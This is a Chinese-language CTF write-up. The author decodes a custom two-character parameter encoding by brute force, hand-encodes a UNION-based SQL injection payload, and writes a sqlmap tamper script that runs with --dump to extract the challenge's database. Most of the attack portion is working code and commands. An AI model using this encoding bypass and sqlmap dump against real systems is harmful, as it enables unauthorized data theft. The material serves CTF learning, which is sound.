記一次沒做出來的ctf題目

題目映入眼帘是這樣子

可以猜測QgcAYAbgbw是Guest這五個字母

5*2=10 故 Qg == G 以此類推

驗證下

於是，下面的腳本可能是這樣。

zf = string.ascii_letters
url = "http://xx.x.x.x:xxxx/?user="
 for i in zf:
  for j in zf:
    resp = requests.get(url + i + j)
    if resp.text[-1] != ' ':
      print(resp.text[-1] + " " + i + j)
      kv[resp.text[-1]] = i+j

print(kv)
於是如願以償的得到了admin這幾個字符對應的值。
XAXwaAZAaQ
我以為結束了，然而並沒有，映入眼帘的像極了SQL注入。
後面的字符要想構造語句需要構造太多了。用上面的腳本就不行了。
於是把所有的字符跑出來，搞成個字典，用到啥跑一下就行了。
腳本大概的思路就是兩層for循環，然後請求數據，看返回包的最後一位是否為空，不為空就增加到字典裡。
結果大概如下：
kv ={'o': 'ag', 'p': 'aw', 'm': 'aA', 'n': 'aQ', 's': 'bg', 't': 'bw', 'q': 'bA', 'r': 'bQ', 'w': 'cg', 'x': 'cw', 'u': 'cA', 'v': 'cQ', '{': 'dg', '|': 'dw', 'y': 'dA', 'z': 'dQ', '\x7f': 'eg', '聙': 'ew', '}': 'eA', '~': 'eQ', '聝': 'fg', '聞': 'fw', '聛': 'fA', '聜': 'fQ', '聡': 'gg', '聢': 'gw', '聟': 'gA', '聠': 'gQ', '聥': 'hg', '聦': 'hw', '聣': 'hA', '聤': 'hQ', '聫': 'ig', '聬': 'iw', '聧': 'iA', '聨': 'iQ', '聯': 'jg', '聰': 'jw', '聭': 'jA', '聮': 'jQ', '聴': 'kg', '聵': 'kw', '聲': 'kA', '聳': 'kQ', '聸': 'lg', '聹': 'lw', '聶': 'lA', '職': 'lQ', '聼': 'mg', '聽': 'mw', '聺': 'mA', '聻': 'mQ', '攏': 'ng', '隴': 'nw', '隆': 'nA', '壟': 'nQ', '摟': 'og', '簍': 'ow', '樓': 'oA', '婁': 'oQ', '蘆': 'pg', '盧': 'pw', '漏': 'pA', '陋': 'pQ', '爐': 'qg', '擄': 'qw', '顱': 'qA', '廬': 'qQ', '魯': 'rg', '麓': 'rw', '滷': 'rA', '虜': 'rQ', '路': 'sg', '賂': 'sw', '碌': 'sA', '露': 'sQ', '祿': 'tg', '錄': 'tw', '鹿': 'tA', '潞': 'tQ', '驢': 'ug', '脌': 'uw', '陸': 'uA', '戮': 'uQ', '脙': 'vg', '脛': 'vw', '脕': 'vA', '脗': 'vQ', '脟': 'wg', '脠': 'ww', '脜': 'wA', '脝': 'wQ', '唇': 'xg', '脤': 'xw', '脡': 'xA', '脢': 'xQ', '脧': 'yg', '脨': 'yw', '脥': 'yA', '脦': 'yQ', '脫': 'zg', '脭': 'zw', '脩': 'zA', '脪': 'zQ', '\x03': 'Ag', '\x04': 'Aw', '\x02': 'AQ', '\x05': 'BA', '\x06': 'BQ', '\x0e': 'Cg', '\x0f': 'Cw', '\x12': 'Dg', '\x13': 'Dw', '\x10': 'DA', '\x11': 'DQ', '\x16': 'Eg', '\x17': 'Ew', '\x14': 'EA', '\x15': 'EQ', '\x1b': 'Fw', '\x18': 'FA', '\x1e': 'Gg', '\x1f': 'Gw', '\x1c': 'GA', '\x1d': 'GQ', '#': 'Hg', '$': 'Hw', '!': 'HA', '"': 'HQ', "'": 'Ig', '(': 'Iw', '%': 'IA', '&': 'IQ', '+': 'Jg', ',': 'Jw', ')': 'JA', '*': 'JQ', '/': 'Kg', '0': 'Kw', '-': 'KA', '.': 'KQ', '3': 'Lg', '4': 'Lw', '1': 'LA', '2': 'LQ', '7': 'Mg', '8': 'Mw', '5': 'MA', '6': 'MQ', ';': 'Ng', '<': 'Nw', '9': 'NA', ':': 'NQ', '?': 'Og', '@': 'Ow', '=': 'OA', '>': 'OQ', 'C': 'Pg', 'D': 'Pw', 'A': 'PA', 'B': 'PQ', 'G': 'Qg', 'H': 'Qw', 'E': 'QA', 'F': 'QQ', 'K': 'Rg', 'L': 'Rw', 'I': 'RA', 'J': 'RQ', 'O': 'Sg', 'P': 'Sw', 'M': 'SA', 'N': 'SQ', 'S': 'Tg', 'T': 'Tw', 'Q': 'TA', 'R': 'TQ', 'W': 'Ug', 'X': 'Uw', 'U': 'UA', 'V': 'UQ', '[': 'Vg', '\\': 'Vw', 'Y': 'VA', 'Z': 'VQ', '_': 'Wg', '`': 'Ww', ']': 'WA', '^': 'WQ', 'c': 'Xg', 'd': 'Xw', 'a': 'XA', 'b': 'XQ', 'g': 'Yg', 'h': 'Yw', 'e': 'YA', 'f': 'YQ', 'k': 'Zg', 'l': 'Zw', 'i': 'ZA', 'j': 'ZQ'}
然後構造語句：
sql = "1 and 1=2 union select 1,(select user())"
sql1 = sql.replace(' ','/**/')
for i in sql1:
  print(kv[i],end='')
# XAXwaAZAaQ
通過這種方式搞了幾個語句，發現整不出來數據表啥的。就放棄了。
轉機出現在剛剛在群裡看了tamper，然後恍然大悟，啊 tamper這樣子寫。我之前想複雜了。
簡單說一下。
觀察一個原始的tamper，sqlmap自帶的。
直接看tamper函數。
發現他return了最後編碼過的payload。
那好，整體的流程就是，我們只需要關心經過改變後的輸出就行了。
輸入是sqlmap自己嘗試的payload。
腳本如下：
# -*- coding:utf-8 -*-

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    """
    s = ''
    kv = {'o': 'ag', 'p': 'aw', 'm': 'aA', 'n': 'aQ', 's': 'bg', 't': 'bw', 'q': 'bA', 'r': 'bQ', 'w': 'cg', 'x': 'cw', 'u': 'cA', 'v': 'cQ', '{': 'dg', '|': 'dw', 'y': 'dA', 'z': 'dQ', '}': 'eA', '~': 'eQ', '聝': 'fg', '聞': 'fw', '聛': 'fA', '聜': 'fQ', '聡': 'gg', '聢': 'gw', '聟': 'gA', '聠': 'gQ', '聥': 'hg', '聦': 'hw', '聣': 'hA', '聤': 'hQ', '聫': 'ig', '聬': 'iw', '聧': 'iA', '聨': 'iQ', '聯': 'jg', '聰': 'jw', '聭': 'jA', '聮': 'jQ', '聴': 'kg', '聵': 'kw', '聲': 'kA', '聳': 'kQ', '聸': 'lg', '聹': 'lw', '聶': 'lA', '職': 'lQ', '聼': 'mg', '聽': 'mw', '聺': 'mA', '聻': 'mQ', '攏': 'ng', '隴': 'nw', '隆': 'nA', '壟': 'nQ', '摟': 'og', '簍': 'ow', '樓': 'oA', '婁': 'oQ', '蘆': 'pg', '盧': 'pw', '漏': 'pA', '陋': 'pQ', '爐': 'qg', '擄': 'qw', '顱': 'qA', '廬': 'qQ', '魯': 'rg', '麓': 'rw', '滷': 'rA', '虜': 'rQ', '路': 'sg', '賂': 'sw', '碌': 'sA', '露': 'sQ', '祿': 'tg', '錄': 'tw', '鹿': 'tA', '潞': 'tQ', '驢': 'ug', '脌': 'uw', '陸': 'uA', '戮': 'uQ', '脙': 'vg', '脛': 'vw', '脕': 'vA', '脗': 'vQ', '脟': 'wg', '脠': 'ww', '脜': 'wA', '脝': 'wQ', '唇': 'xg', '脤': 'xw', '脡': 'xA', '脢': 'xQ', '脧': 'yg', '脨': 'yw', '脥': 'yA', '脦': 'yQ', '脫': 'zg', '脭': 'zw', '脩': 'zA', '脪': 'zQ',  '#': 'Hg', '$': 'Hw', '!': 'HA', '"': 'HQ', "'": 'Ig', '(': 'Iw', '%': 'IA', '&': 'IQ', '+': 'Jg', ',': 'Jw', ')': 'JA', '*': 'JQ', '/': 'Kg', '0': 'Kw', '-': 'KA', '.': 'KQ', '3': 'Lg', '4': 'Lw', '1': 'LA', '2': 'LQ', '7': 'Mg', '8': 'Mw', '5': 'MA', '6': 'MQ', ';': 'Ng', '<': 'Nw', '9': 'NA', ':': 'NQ', '?': 'Og', '@': 'Ow', '=': 'OA', '>': 'OQ', 'C': 'Pg', 'D': 'Pw', 'A': 'PA', 'B': 'PQ', 'G': 'Qg', 'H': 'Qw', 'E': 'QA', 'F': 'QQ', 'K': 'Rg', 'L': 'Rw', 'I': 'RA', 'J': 'RQ', 'O': 'Sg', 'P': 'Sw', 'M': 'SA', 'N': 'SQ', 'S': 'Tg', 'T': 'Tw', 'Q': 'TA', 'R': 'TQ', 'W': 'Ug', 'X': 'Uw', 'U': 'UA', 'V': 'UQ', '[': 'Vg', 'Y': 'VA', 'Z': 'VQ', '_': 'Wg', '`': 'Ww', ']': 'WA', '^': 'WQ', 'c': 'Xg', 'd': 'Xw', 'a': 'XA', 'b': 'XQ', 'g': 'Yg', 'h': 'Yw', 'e': 'YA', 'f': 'YQ', 'k': 'Zg', 'l': 'Zw', 'i': 'ZA', 'j': 'ZQ'}
    payload = payload.replace(' ','/**/')
    for i in payload:
        s += kv[i]
    return s
通過這個tamper可以將sqlmap傳入的字符串按照tamper裡面替換字符的方式更改。
sqlmap -u http://x.x.x.x:x/\?user\=XAXwaAZAaQ\&id\=1 --proxy=http://127.0.0.1:8080 --tamper=ctf -p id --dump
這裡直接dump數據了。
proxy的作用是讓sqlmap走一下burp代理，是用來驗證payload發沒發錯的。